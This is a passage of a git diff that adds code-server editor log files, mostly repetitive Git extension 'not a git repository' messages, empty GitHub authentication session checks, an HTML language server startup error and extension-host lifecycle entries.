fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:25:52.217 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 22:25:52.217 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:26:08.555 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:26:08.555 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:26:10.244 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:26:10.244 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:30:15.756 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:30:15.756 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:31:10.818 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:31:10.818 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:32:02.634 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:32:02.634 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:32:47.704 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 22:32:47.704 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:32:48.488 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 22:32:48.488 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:34:44.194 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:34:44.195 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:37:50.991 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:37:50.991 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:37:51.673 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:37:51.673 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:39:25.641 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 22:39:25.641 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:39:32.321 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 22:39:32.322 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:39:32.886 [info] > git rev-parse --show-toplevel [4ms] +2026-01-20 22:39:32.886 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:40:23.690 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:40:23.690 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:40:24.278 [info] > git rev-parse --show-toplevel [4ms] +2026-01-20 22:40:24.278 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:47:43.076 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:47:43.076 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:48:50.938 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 22:48:50.938 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:48:56.258 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:48:56.258 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:48:56.761 [info] > git rev-parse --show-toplevel [4ms] +2026-01-20 22:48:56.761 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:49:26.889 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:49:26.889 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:49:36.255 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:49:36.256 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:52:50.065 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:52:50.065 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:52:56.208 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:52:56.208 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:56:40.774 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:56:40.774 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:57:24.169 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:57:24.169 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:57:32.653 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:57:32.653 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:02:21.363 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 23:02:21.363 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:03:01.359 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 23:03:01.359 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:06:17.618 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 23:06:17.618 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:08:07.167 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 23:08:07.167 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:08:44.151 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 23:08:44.151 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:20:59.063 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 23:20:59.063 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:31:21.545 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 23:31:21.545 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:32:25.406 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 23:32:25.406 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:33:14.461 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 23:33:14.461 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:37:57.780 [info] > git rev-parse --show-toplevel [4ms] +2026-01-20 23:37:57.780 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 23:39:17.569 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 23:39:17.569 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 00:40:57.753 [info] > git rev-parse --show-toplevel [0ms] +2026-01-21 00:40:57.753 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 00:43:47.297 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 00:43:47.297 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 00:56:42.991 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 00:56:42.991 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 01:08:30.574 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 01:08:30.574 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 01:10:59.386 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 01:10:59.386 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 01:15:43.176 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 01:15:43.176 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 01:15:52.662 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 01:15:52.662 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 01:19:03.938 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 01:19:03.938 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 01:19:26.746 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 01:19:26.746 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 01:21:37.086 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 01:21:37.086 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 01:21:56.684 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 01:21:56.684 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T175427/exthost2/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T175427/exthost2/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..37590fe --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost2/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-20 18:02:50.026 [info] Reading sessions from keychain... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.026 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.026 [info] Got 0 sessions for ... +2026-01-20 18:02:50.035 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.035 [info] Got 0 sessions for ... +2026-01-20 18:02:50.062 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.062 [info] Got 0 sessions for ... +2026-01-20 18:02:50.062 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.062 [info] Got 0 sessions for ... +2026-01-20 18:02:50.062 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.062 [info] Got 0 sessions for ... +2026-01-20 18:02:50.062 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.062 [info] Got 0 sessions for ... +2026-01-20 18:02:50.062 [info] Getting sessions for all scopes... +2026-01-20 18:02:50.062 [info] Got 0 sessions for ... +2026-01-20 18:02:51.352 [info] Getting sessions for all scopes... +2026-01-20 18:02:51.352 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T175427/exthost2/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T175427/exthost2/vscode.github/GitHub.log new file mode 100755 index 0000000..61891ea --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost2/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 18:02:50.187 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T175427/exthost2/vscode.html-language-features/HTML Language Server.log b/code-server-config/data/logs/20260120T175427/exthost2/vscode.html-language-features/HTML Language Server.log new file mode 100755 index 0000000..87a3175 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost2/vscode.html-language-features/HTML Language Server.log @@ -0,0 +1,5 @@ +2026-01-21 01:22:42.544 [error] Request textDocument/documentColor failed. +Error: Starting server failed + at T.$start (/app/code-server/lib/vscode/extensions/html-language-features/client/dist/node/htmlClientMain.js:2:56998) + at async T.sendRequest (/app/code-server/lib/vscode/extensions/html-language-features/client/dist/node/htmlClientMain.js:2:40589) + at async sS.provideColors (file:///app/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:144:164465) diff --git a/code-server-config/data/logs/20260120T175427/exthost3/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T175427/exthost3/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost3/remoteexthost.log b/code-server-config/data/logs/20260120T175427/exthost3/remoteexthost.log new file mode 100755 index 0000000..8a172c7 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost3/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-21 12:17:15.728 [info] Extension host with pid 86155 started +2026-01-21 12:17:15.735 [info] Lock '/config/data/User/workspaceStorage/787b6db1/vscode.lock': Lock acquired. +2026-01-21 12:17:15.853 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-21 12:17:15.854 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-21 12:17:15.967 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-21 12:17:16.005 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-21 12:17:16.006 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-21 12:17:16.146 [info] Eager extensions activated +2026-01-21 12:17:16.146 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-21 12:17:16.147 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-21 12:46:17.694 [info] Extension host terminating: received terminate message from renderer +2026-01-21 12:46:17.695 [info] Lock '/config/data/User/workspaceStorage/787b6db1/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-21 12:46:17.731 [info] Extension host with pid 86155 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T175427/exthost3/vscode.git/Git.log b/code-server-config/data/logs/20260120T175427/exthost3/vscode.git/Git.log new file mode 100755 index 0000000..3b27c30 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost3/vscode.git/Git.log @@ -0,0 +1,35 @@ +2026-01-21 12:17:16.192 [info] [main] Log level: Info +2026-01-21 12:17:16.192 [info] [main] Validating found git in: "git" +2026-01-21 12:17:16.192 [info] [main] Using git "2.43.0" from "git" +2026-01-21 12:17:16.192 [info] [Model][doInitialScan] Initial repository scan started +2026-01-21 12:17:16.192 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 12:17:16.192 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.192 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 12:17:16.192 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.192 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 12:17:16.192 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.192 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 12:17:16.192 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.197 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 12:17:16.197 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.224 [info] > git rev-parse --show-toplevel [24ms] +2026-01-21 12:17:16.224 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.231 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 12:17:16.231 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.236 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 12:17:16.236 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.240 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 12:17:16.240 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 12:17:16.244 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-21 12:17:17.984 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 12:17:17.984 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T175427/exthost3/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T175427/exthost3/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..991c25f --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost3/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-21 12:17:16.074 [info] Reading sessions from keychain... +2026-01-21 12:17:16.074 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.074 [info] Got 0 sessions for ... +2026-01-21 12:17:16.074 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.074 [info] Got 0 sessions for ... +2026-01-21 12:17:16.074 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.074 [info] Got 0 sessions for ... +2026-01-21 12:17:16.074 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.075 [info] Got 0 sessions for ... +2026-01-21 12:17:16.075 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.075 [info] Got 0 sessions for ... +2026-01-21 12:17:16.075 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.075 [info] Got 0 sessions for ... +2026-01-21 12:17:16.075 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.075 [info] Got 0 sessions for ... +2026-01-21 12:17:16.075 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.075 [info] Got 0 sessions for ... +2026-01-21 12:17:16.075 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.075 [info] Got 0 sessions for ... +2026-01-21 12:17:16.075 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.075 [info] Got 0 sessions for ... +2026-01-21 12:17:16.101 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.101 [info] Got 0 sessions for ... +2026-01-21 12:17:16.101 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.101 [info] Got 0 sessions for ... +2026-01-21 12:17:16.101 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.101 [info] Got 0 sessions for ... +2026-01-21 12:17:16.101 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.101 [info] Got 0 sessions for ... +2026-01-21 12:17:16.101 [info] Getting sessions for all scopes... +2026-01-21 12:17:16.101 [info] Got 0 sessions for ... +2026-01-21 12:17:17.980 [info] Getting sessions for all scopes... +2026-01-21 12:17:17.980 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T175427/exthost3/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T175427/exthost3/vscode.github/GitHub.log new file mode 100755 index 0000000..1cf00c5 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost3/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-21 12:17:16.198 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T175427/exthost4/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T175427/exthost4/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost4/remoteexthost.log b/code-server-config/data/logs/20260120T175427/exthost4/remoteexthost.log new file mode 100755 index 0000000..3c1e639 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost4/remoteexthost.log @@ -0,0 +1,19 @@ +2026-01-21 19:20:38.102 [info] Extension host with pid 91748 started +2026-01-21 19:20:38.109 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Lock acquired. +2026-01-21 19:20:38.231 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-21 19:20:38.232 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-21 19:20:38.232 [info] ExtensionService#_doActivateExtension vscode.html-language-features, startup: false, activationEvent: 'onLanguage:html' +2026-01-21 19:20:38.816 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-21 19:20:38.858 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-21 19:20:38.859 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-21 19:20:39.084 [info] Eager extensions activated +2026-01-21 19:20:39.085 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-21 19:20:39.085 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-21 19:20:41.813 [info] ExtensionService#_doActivateExtension vscode.tunnel-forwarding, startup: false, activationEvent: 'onTunnel' +2026-01-21 19:20:43.599 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-21 19:51:19.542 [info] ExtensionService#_doActivateExtension vscode.configuration-editing, startup: false, activationEvent: 'onLanguage:jsonc' +2026-01-21 19:51:19.543 [info] ExtensionService#_doActivateExtension vscode.json-language-features, startup: false, activationEvent: 'onLanguage:jsonc' +2026-01-21 19:51:19.543 [info] ExtensionService#_doActivateExtension vscode.typescript-language-features, startup: false, activationEvent: 'onLanguage:jsonc' +2026-01-22 02:15:22.156 [info] Extension host terminating: received terminate message from renderer +2026-01-22 02:15:22.157 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-22 02:15:22.200 [info] Extension host with pid 91748 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T175427/exthost4/vscode.git/Git.log b/code-server-config/data/logs/20260120T175427/exthost4/vscode.git/Git.log new file mode 100755 index 0000000..a6ac4f9 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost4/vscode.git/Git.log @@ -0,0 +1,596 @@ +2026-01-21 19:20:39.145 [info] [main] Log level: Info +2026-01-21 19:20:39.145 [info] [main] Validating found git in: "git" +2026-01-21 19:20:39.145 [info] [main] Using git "2.43.0" from "git" +2026-01-21 19:20:39.145 [info] [Model][doInitialScan] Initial repository scan started +2026-01-21 19:20:39.145 [info] > git rev-parse --show-toplevel [8ms] +2026-01-21 19:20:39.145 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.145 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 19:20:39.145 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.145 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 19:20:39.145 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.192 [info] > git rev-parse --show-toplevel [49ms] +2026-01-21 19:20:39.192 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.209 [info] > git rev-parse --show-toplevel [12ms] +2026-01-21 19:20:39.209 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.214 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 19:20:39.214 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.220 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 19:20:39.220 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.225 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 19:20:39.225 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.229 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 19:20:39.229 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:39.232 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-21 19:20:39.542 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 19:20:39.542 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 19:20:41.657 [info] > git rev-parse --show-toplevel [3ms] +2026-01-21 19:20:41.657 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). 